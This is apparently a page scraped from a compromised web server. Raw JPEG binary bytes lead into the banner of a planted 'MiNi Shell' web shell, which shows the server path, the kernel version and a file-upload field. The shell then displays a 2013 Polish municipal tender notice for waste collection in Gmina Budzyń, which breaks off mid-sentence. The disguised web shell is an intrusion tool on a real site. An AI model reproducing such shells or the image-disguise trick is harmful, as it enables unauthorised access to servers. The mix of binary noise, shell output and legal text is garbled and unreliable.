JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130416/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130416/149800-N-2013.html

<p class="kh_header"><b>Budzyń: Odbiór odpadów komunalnych zmieszanych                 
oraz odbiór i zagospodarowanie 
odpadów komunalnych segregowanych 
z terenu Gminy Budzyń</b><br>
<b>Numer ogłoszenia: 149800 - 2013; data zamieszczenia: 16.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Budzyń , ul. Lipowa 6, 64-840 Budzyń, woj. wielkopolskie, tel. 067 2843201, faks 067 2843313.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.budzyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór odpadów komunalnych zmieszanych                 
oraz odbiór i zagospodarowanie 
odpadów komunalnych segregowanych 
z terenu Gminy Budzyń.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Odbiór odpadów komunalnych zmieszanych                 
oraz odbiór i zagospodarowanie 
odpadów komunalnych segregowanych 
z terenu Gminy Budzyń
Opis przedmiotu zamówienia.
1.Przedmiotem zamówienia jest  świadczenie usługi odbioru  i transportu odpadów komunalnych zmieszanych powstających w gospodarstwach domowych z terenu Gminy Budzyń (dalej Gminy),z wyłączeniem odpadów związanych z prowadzeniem działalności gospodarczej. Przedmiot zamówienia obejmuje usługi i transport odbioru  odpadów komunalnych zmieszanych z nieruchomości określonych w załączniku 1 i 2 do SIWZ oraz odbiór i zagospodarowanie odpadów segregowanych wg pkt 4.
2.Odpady komunalne zmieszane będą odbierane od właścicieli nieruchomości i transportowane do instalacji zastępczej: Międzygminne składowisko odpadów komunalnych Kopaszyn, gm. Wągrowiec, natomiast odpady komunalne segregowane Wykonawca zagospodaruje we własnym zakresie przekazując je do instalacji odzysku i unieszkodliwiania zgodnie z hierarchią postępowania z odpadami określoną w obowiązujących przepisach prawa.
Uwaga: Jeżeli  przed przekazaniem  odebranych selektywnie odpadów do instalacji ,  zostały skierowane przez podmiot odbierający odpady  do przesortowania  to pozostałości z sortowania odpad 19 12 12  przeznaczone do składowania  muszą być przekazane do instalacji zastępczych określonych dla regionu do którego przynależy gmina Budzyń.
3.Zamawiający będzie sam regulował opłaty za zagospodarowanie odpadów komunalnych zmieszanych dostarczonych do w/w instalacji zastępczej na podstawie ilości odpadów dostarczonych przez Wykonawcę zamówienia.
4.Zbiórka odpadów komunalnych odbywać się będzie z podziałem na
1.odpady niesegregowane zmieszane (kod odpadu 20 03 01)
2.odpady opakowaniowe z metali, tworzyw sztucznych oraz odpady opakowaniowe wielomateriałowe (kody 150101, 150102, 150104, 150105, 150106, )
3.odpady segregowane : szkło (kody 150107, 200102)
4.odpady segregowane :papier, tektura i tekstylia (kody 150101, 200101, 150109)
5.Zbiórka odpadów komunalnych  z posesji zamieszkałych znajdujących się na terenie Gminy Budzyń:
Wykaz posesji na terenie Gminy Budzyń wraz z ilością pojemników, które należy opróżnić  stanowi załącznik nr 1 do SIWZ.
Mieszkańcy na swoich nieruchomościach będą zbierać odpady komunalne w  systemie mieszanym: pojemnikowym i workowym tj. 
a)niesegregowane (zmieszane) odpady komunalne:
Niesegregowane (zmieszane) odpady komunalne gromadzone będą  w pojemnikach.
Częstotliwość załadunku i wywozu  1 raz na dwa tygodnie.
b)selektywnie zbierane odpady komunalne:
Selektywna zbiórka odpadów: papieru, tektury, tekstylii i opakowań
wielomateriałowych,metali, tworzyw sztucznych na terenie Gminy Budzyń będzie się odbywać w systemie workowym. Natomiast szkło w systemie pojemnikowym.
Częstotliwość załadunku i wywozu 1 raz w miesiącu.
c)odpady zielone i biodegradowalne: 
Odpady zielone i biodegradowalne będą gromadzone w pojemniku z odpadami komunalnymi niesegregowanymi (zmieszanymi).
(Regulamin utrzymania czystości i porządku w § 11 ust. 3 dopuszcza kompostowanie odpadów zielonych i ulegających biodegradacji na terenie nieruchomości,na której powstały).
Częstotliwość załadunku i wywozu 1 raz na dwa tygodnie.
Pojemniki do zbiórki odpadów komunalnych zmieszanych posiadają mieszkańcy,         natomiast pojemnik do szkła i worki na papier, tekturę, tekstylia i opakowania wielomateriałowe, metale, tworzywa sztuczne, zapewnia Gmina.
Zamawiający do dnia 30 czerwca 2013 roku dostarczy mieszkańcom pojemnik na szkło i worki do selektywnego gromadzenia odpadów komunalnych.
Wykonawca jest zobowiązany pozostawienie zamiennie za odebrany worek z odpadami  selektywnie zbieranymi nowego urządzenia (worka).
Wykonawca zapewni prowadzenie systemu oznakowania worków do selektywnej zbiórki odpadów komunalnych, umożliwiający ustalenie, z której posesji został odebrany worek  i czy umieszczone w nim odpady są selekcjonowane.
6.Zbiórki odpadów komunalnych z terenu Gminy Budzyń należy dokonać poprzez opróżnianie koszy ulicznych (pojemność 50l) znajdujących się na terenie Gminy Budzyń, w częstotliwości 1 raz na dwa tygodnie.
Lp.Nazwa miejscowości Ulica Ilość pojemników (szt.)
1Sokołowo Budzyńskie 5
2Bukowiec 4
3Wyszyny 6
4Prosna 3
5Podstolice 4
6Dziewoklucz 3
7Budzyń:Osiedle Kwiatowe 7
Cicha 1
Wągrowiecka 3
Osiedle Piaski 3
Margonińska 4
Osiedle Zielone 3
Lipowa 4
Rynkowa 12
Osiedle Wierzbowe 3
Przemysłowa 4
Ogrodowa 1
Bugaje 3
Władysława Łokietka 6
Chodzieska 3
Marszałka Piłsudskiego 5
Powstańców Wielkopolskich 3
Dworcowa 8
Rogozińska plus kosze przy Gimnazjum 3+5
Razem:106
Gmina przewiduje zwiększyć ilość koszy ulicznych do 150 sztuk.
7.Odbiór i transport odpadów.
1.Zamawiający w załącznikach  Nr 1, 2 do SIWZ określił, ilości nieruchomości i punktów z których należy odebrać odpady, ilość i wielkość pojemników, częstotliwość odbioru odpadów itp.
2.Odbiór odpadów odbywał się będzie zgodnie ze sporządzonym i uzgodnionym         z Zamawiającym przez Wykonawcę harmonogramem odbioru  odpadów komunalnych dla Gminy Budzyń.
Odpady komunalne należy odbierać od mieszkańców Gminy Budzyń w dniach             od poniedziałku do piątku w godzinach od 7:00 do 18:00.
W harmonogramie należy wyszczególnić nazwę ulicy, datę i przedział godzinowy,       w których będą odbierane odpady komunalne.
3.Wykonawca sporządzi harmonogram odbioru odpadów  na terenie Gminy Budzyń    na podstawie informacji zawartych w niniejszej specyfikacji.
Harmonogram odbioru odpadów stanowić będzie załącznik do umowy.
Właściciel nieruchomości zapewni pracownikom Wykonawcy dostęp do urządzeń,       w których gromadzone są odpady  komunalne w dniach ustalonych wg harmonogramu wywozu. Urządzenia do gromadzenia odpadów w dniach odbioru będą udostępnione Wykonawcy przed nieruchomością lub na jej terenie w widocznym miejscu.
4.Częstotliwość wywozu odpadów  jest częstotliwością wymaganą,  a jej ewentualne zmniejszenie bądź zwiększenie  będzie możliwe w trakcie realizacji usługi wywozu,jeżeli ilość produkowanych odpadów będzie niższa lub wyższa od ilości przewidywanej oraz Wykonawca uzyska pisemną zgodę Zamawiającego.  
5.Pojazdy Wykonawcy,  w trakcie realizacji usług odbioru odpadów realizowanych     na rzecz Zamawiającego nie mogą jednocześnie odbierać odpadów komunalnych z nieruchomości niezamieszkałych , które nie są objęte  gminnym system gospodarowania odpadami.
Odbiór jest dopuszczony  tylko i wyłącznie w przypadku  gdy odbiór  z pojemnika stanowiącego wyposażenie nieruchomości niezamieszkałej jest jednoznacznie ewidencjonowany elektronicznie z wyszczególnieniem danych o pojemności pojemnika i rodzaju odpadów w nim  gromadzonych, które to dane pozwolą precyzyjnie określić  ostateczną  masę odpadów odebranych i zagospodarowanych w ramach  realizacji usługi   na rzecz Zamawiającego.
6.Wykonawca ma obowiązek:
a)w zakresie realizacji przedmiotu zamówienia porządkować teren zanieczyszczony odpadami i innymi zanieczyszczeniami wysypanymi z pojemników, kontenerów, worków i pojazdów w trakcie realizacji usługi wywozu;
b)zbierania odpadów leżących luzem obok zapełnionych pojemników, kontenerów na terenach osiedli mieszkaniowych,  bloków wielorodzinnych oraz doprowadzenie         do porządku terenów przyległych, zanieczyszczonych na skutek przepełnienia wymienionych urządzeń służących do gromadzenia odpadów, obowiązek ten winien    być realizowany niezwłocznie po opróżnieniu pojemników, kontenerów;
c)zachowania właściwego stanu sanitarnego pojemników i kontenerów  zlokalizowanych w punktach zbiórki oraz na terenach zbiorowego zamieszkania (spółdzielnie) służących do gromadzenia odpadów zgodnie z obowiązującymi przepisami w tym zakresie. Mycie, dezynfekcja pojemników winno odbywać się w warunkach spełniających wymagania z zakresu ochrony środowiska i ochrony sanitarnej, w miejscu odbioru odpadów z częstotliwością co najmniej 1 raz na 6 miesięcy; wykonawca zobowiązany jest poinformować zamawiającego o terminie i miejscu wykonywania usługi oraz przedstawić pisemny raport z wykonania usługi, zawierający miejsca (adresy) i ilości pojemników poddanych myciu i odkażaniu;
d)ponosić koszty oraz dokonać  naprawy szkód wyrządzonych podczas wykonywania usługi wywozu odpadów komunalnych w Gminie (uszkodzenia chodników osiedlowych, punktów do składowania odpadów , pojemników itp.)
e)wyposażyć własnych pracowników zajmujących się wywozem odpadów w odzież ochronną z widocznym logo firmy oraz w identyfikatory do dnia poprzedzającego dzień rozpoczęcia świadczenia usługi.
7.Standardy sanitarne dotyczące wykonania zamówienia:
Wykonawca zobowiązany jest do realizacji zamówienia uwzględniając zapisy ustawy z dnia 27 kwietnia 2001 r. o odpadach, rozporządzenia Ministra Środowiska w sprawie wymagań odbierania odpadów komunalnych od właścicieli nieruchomości, rozporządzenia Ministra Środowiska w sprawie bezpieczeństwa i higieny pracy przy gospodarowaniu odpadami komunalnymi, Regulaminu utrzymania czystości i porządku na terenie Gminy Budzyń.
8.W zakresie sprawozdawczości Wykonawca zobowiązany będzie do sporządzania kwartalnych sprawozdań i przekazywania ich (w wersji papierowej i elektronicznej) do końca miesiąca następującego po kwartale, którego dotyczy. Sprawozdania powinny być sporządzone zgodnie z Rozporządzeniem Ministra Środowiska z 15 maja 2012 r. w spr. wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami, a w przypadku zmiany rozporządzenia, zgodnie z obowiązującymi wzorami druków. Sprawozdanie musi zawierać:
1)informacje o masie poszczególnych rodzajów odebranych odpadów komunalnych   oraz sposobie ich zagospodarowania, wraz ze wskazaniem instalacji, do której zostały przekazane odebrane od właścicieli nieruchomości zmieszane odpady komunalne, odpady zielone oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania;
2)informacje o masie odpadów komunalnych ulegających biodegradacji:
a)przekazanych do składowania na składowisku odpadów,
b)nieprzekazanych do składowania na składowisku odpadów i sposobie ich zagospodarowania
3)liczbę właścicieli nieruchomości, od których zostały odebrane odpady komunalne
4)wskazanie właścicieli nieruchomości, którzy zbierają odpady komunalne w sposób  
niezgodny z regulaminem
5)poziomy recyklingu, przygotowania do ponownego użycia i odzysku, wyliczonych zgodnie z Rozporządzeniem Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012r. poz. 645)
6) Wykonawca wraz ze sprawozdaniami przekaże Zamawiającemu kopie dowodów  
dostarczania odpadów do odzysku lub unieszkodliwiana tj. karty ewidencji odpadów   bądź karty przekazania odpadów; 
7)Wykonawca przekaże Zamawiającemu co miesiąc informację o ilości  i rodzaju wydanych  pojemników i worków w terminie do dnia 10 następnego miesiąca.
9.Wykonawca zobowiązany będzie do przedkładania Zamawiającemu najpóźniej wraz z fakturą za dany okres rozliczeniowy raportów wagowych zawierających  wyszczególnienie miejsca odbioru odpadów oraz ilości i rodzaju odebranych odpadów (zgodnie z obowiązującą klasyfikacją odpadów), na których znajdować się winna adnotację, że odpady pochodzą z terenu Gminy Budzyń.
10.Wykonawca powinien wykazać sposób zagospodarowania odpadów komunalnych segregowanych: papier i opakowania wielomateriałowe, tworzywa sztuczne, metale i szkło przed podpisaniem umowy z  Zamawiającym;
11.Wykonawca zobowiązany będzie do monitorowania obowiązku ciążącego na właścicielu nieruchomości w zakresie selektywnego zbierania odpadów komunalnych. W przypadku stwierdzenia, że właściciel nieruchomości nie wywiązuje się z obowiązku w zakresie segregacji odpadów, Wykonawca odbiera odpady jako niesegregowane (zmieszane) odpady komunalne. Wykonawca zobowiązany będzie w terminie 2 dni roboczych od dnia zaistnienia opisanej sytuacji do pisemnego lub drogą elektroniczną poinformowania Zamawiającego o niewywiązaniu się z obowiązków segregacji odpadów przez właściciela nieruchomości. Do informacji Wykonawca zobowiązany będzie załączyć dokumentację - zdjęcie  wykonane aparatem cyfrowym (znajdujący się na wyposażeniu samochodu odbierającego odpady z nieruchomości) i protokół z zaistnienia takiego zdarzenia. Z dokumentacji musi jednoznacznie wynikać, jakiej dotyczy nieruchomości, w jakim dniu i o jakiej godzinie doszło do ustalenia ww. zdarzenia
12.Wykonawca zobowiązany będzie do ważenia wszystkich odebranych odpadów komunalnych  na legalizowanej wadze (ul. Dworcowa - plac przy Biedronce w Budzyniu), przed dostarczeniem ich do zastępczej instalacji
13.Zamawiający zaleca przeprowadzenie wizji lokalnej na terenie Gminy Budzyń w celu zapoznania się z trasami przejazdu i prawidłowym dokonaniu wyceny usługi.
Uwaga: Informujemy, że przybliżona ilość kilometrów trasy przejazdu celem jednorazowej   zbiórki odpadów komunalnych na terenie Gminy Budzyń wynosi około 900km.
Wykaz proponowanych tras przejazdu stanowi załącznik nr 3a do SIWZ
14.Wykonawca zapewnia możliwość wyposażenia nieruchomości w pojemniki          do zbierania odpadów komunalnych zmieszanych (niesegregowanych), jeśli Właściciel nieruchomości wyrazi taką wolę - nie jest to objęte przedmiotem zamówienia.
Zasady ilości i pojemności pojemników na poszczególne nieczystości zostały określone w Regulaminie utrzymania czystości i porządku w Gminie Budzyń. 
Właściciele nieruchomości są zobowiązani zbierać odpady komunalne zmieszane (niesegregowane) w urządzenia typu pojemnik, natomiast odpady komunalne segregowane będą zbierane w systemie workowym (z wyjątkiem szkła).   Worki na odpady komunalne segregowane Wykonawca będzie przekazywał mieszkańcom nieodpłatnie raz w miesiącu. 
B.Szczegółowe dane charakteryzujące zamówienie:
1.Powierzchnia Gminy Budzyń wynosi 20 855ha, a średnia gęstość zaludnienia -        42 mieszkańców na km2 .
2.Liczba mieszkańców zameldowanych na terenie Gminy Budzyń, którzy będą objęci usługą odbierania odpadów komunalnych w gminie wynosi 8 601 osób.
3.Wykaz urządzeń do gromadzenia odpadów komunalnych:
1).Wielkości pojemników:
Do zbierania niesegregowanych (zmieszanych) odpadów komunalnych mogą być stosowane pojemniki o pojemności: 120 l, 240 l, 1100 l. Każda nieruchomość musi być wyposażona w co najmniej 1 pojemnik o pojemności minimum 120 l na zmieszane odpady komunalne. Każda nieruchomość musi być wyposażona w komplet pojemników i worków (minimum 2 pojemniki i 3 worki) do selektywnego zbierania odpadów, a każdy z nich musi mieć pojemności minimum 120 l. Wszystkie pojemniki powinny charakteryzować się odpowiednią wytrzymałością mechaniczną.
2).Oznaczenie pojemników:
Pojemniki do zbierania stałych odpadów komunalnych powinny być oznaczone zgodnie  z poniższym: pojemnik koloru zielonego przeznaczony na odpady niesegregowane, pojemnik koloru niebieskiego do zbierania szkła z napisem: SZKŁO, worek koloru żółtego do zbierania tworzyw sztucznych z napisem PLASTIK, worek koloru niebieskiego do zbierania papieru, tektury i tekstylia oraz opakowań wielomateriałowych z napisem PAPIER, worek koloru czerwonego do zbierania metali z napisem METAL.
C.Ilości odpadów zebrane z terenu gminy za rok 2012 według sprawozdań podmiotów odbierających odpady :
Rodzaj odpadów 2012
Mg na rok
Odpady komunalne zmieszane 1 300
odpady papier tektura 121
odpady opakowaniowe z metali, tworzyw sztucznych oraz odpady opakowaniowe 46
Odpady szkło 115
W zakresie tonażu  pozostałych odpadów brak danych.  
Przedmiot   zamówienia   obejmuje   również   wszystkie   prace   i   obowiązki   wykonawcy wymienione we wzorze umowy..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza w okresie 2 lat od podpisania umowy, udzielenia 
niezbędnego, uzasadnionego zamówienia uzupełniającego, zgodnie z przepisami 
zapisanymi w art. 41, pkt. 15 i art. 67 ust. l pkt 6  ustawy PZP. 
Zamawiający udzieli takich zamówień w przypadku pojawienia się zapotrzebowania na
usługi objęte przedmiotem zamówienia ponad bieżące zamówienie w okresie objętym
umową.      
Określa się dopuszczalną wartość zamówienia uzupełniającego w ramach realizowanego
zadania (usługi) do 20%  wartości umowy podstawowej,</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.20.00-9, 90.51.13.00-5, 90.51.10.00-2, 90.51.31.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w prowadzonym postępowaniu ustanowił wadium.

1.Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 10.000,00,- zł (słownie:dziesięćtysięcyzłotych00/100).
2.Wykonawca może wnieść wadium w jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
1)pieniądzu,
2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)gwarancjach bankowych,
4)gwarancjach ubezpieczeniowych,
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r. Nr 42, poz. 275).
3.Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4.Wadium w pieniądzu należy wnieść przelewem  na konto Zamawiającego:

Bank Spółdzielczy Chodzież / Oddział Budzyń                          
Nr konta 26894500022600010120000070
5.W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
6.W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego w Urzędzie Gminy w Budzyniu, ul. Lipowa 6, 64-840 Budzyń (w sekretariacie) lub dołączyć do składanej oferty.
7.Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy.
8.Zwrot lub zatrzymanie wniesionego wadium następuje zgodnie z zapisami art. 46 PZP.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku: 

 Warunek ten zostanie spełniony, jeśli wykonawca:
a) będzie posiadał aktualne zaświadczenie wydane na podstawie ustawy z dnia  2 lipca 2004 r. o swobodzie działalności gospodarczej (tekst jednolity Dz. U. z 2010 r. Nr 220, poz. 1447 ze zm.) i ustawy o utrzymaniu czystości i porządku w gminach (tekst jednolity Dz. U. z 2012 r. Nr 391) przez Wójta Gminy Budzyń o dokonaniu  wpisu do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych będących przedmiotem niniejszego postępowania;
b) będzie posiadał numer rejestrowy nadany przez Głównego Inspektora Ochrony Środowiska zgodnie z art. 10 ust. 1 i 2 ustawy z dnia 29 lipca 2005r. o zużytym sprzęcie elektrycznym i elektronicznym (Dz. U. Nr 180, poz. 1495);
c) będzie posiadał zezwolenie na prowadzenie odzysku lub unieszkodliwiania odpadów zgodnie z art. 26 ustawy z dnia 27 kwietnia 2001 r. o odpadach.
d) będzie posiadał zezwolenie na zbieranie odpadów oraz transport odpadów zgodnie z art. 28 ustawy z 27 kwietnia 2001 r. o odpadach.
Ocena spełnienia na podstawie załączonych dokumentów złożonych przez Oferenta.
(W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich).
Spełnienie warunku przez złożenie wymaganych dokumentów.
Zamawiający dokona oceny spełniania warunków na zasadzie spełnia lub nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonania oceny spełnienia tego warunku:
1) warunek ten będzie spełniony, jeżeli Wykonawca wykaże, że  w okresie ostatnich 3 lat przed upływem terminu składania ofert o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, posiada wiedzę i doświadczenie w wykonaniu co najmniej 1 usługi odpowiadającej swoim rodzajem usłudze stanowiącej przedmiot zamówienia obejmującą wykonanie usługi odbierania odpadów komunalnych o wartości całkowitej nie mniejszej niż 30 000,00zł (słownie:trzydzieścitysięcyzłotych00/100) rocznie  w czasie świadczenia nie krótszym niż 12 kolejnych miesięcy.                  
(W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będzie ich łączne doświadczenie).
Wykonawca złoży wraz z ofertą wykaz usług z załączeniem dokumentów potwierdzających, że usługi te  zostały wykonane lub są wykonywane prawidłowo
Zgodnie z  załącznikiem nr 6  do SIWZ.
Zamawiający dokona oceny spełniania warunków na zasadzie spełnia lub nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonania oceny spełnienia tego warunku: 

Warunek ten zostanie spełniony, jeżeli Wykonawca:
1)będzie dysponował bazą magazynowo - transportową usytuowaną na terenie Gminy Budzyń lub w odległości nie większej niż 60km od granic tej Gminy. Baza powinna być usytuowana na terenie, do którego Wykonawca posiada tytuł prawny. Teren bazy musi być zabezpieczony w sposób uniemożliwiający wstęp osobom nieupoważnionym. Miejsce do parkowania pojazdów na bazie powinno być zabezpieczone przed emisją zanieczyszczeń do gruntu. Na terenie bazy muszą być zabezpieczone miejsca do magazynowania selektywnie zebranych odpadów komunalnych, które będą zabezpieczone przed emisją zanieczyszczeń do gruntu oraz zabezpieczone przed działaniem czynników atmosferycznych. Teren bazy magazynowo - transportowej musi być wyposażony w urządzenia lub systemy zapewniające zagospodarowanie wód opadowych i ścieków przemysłowych, pochodzących z terenu bazy zgodnie z 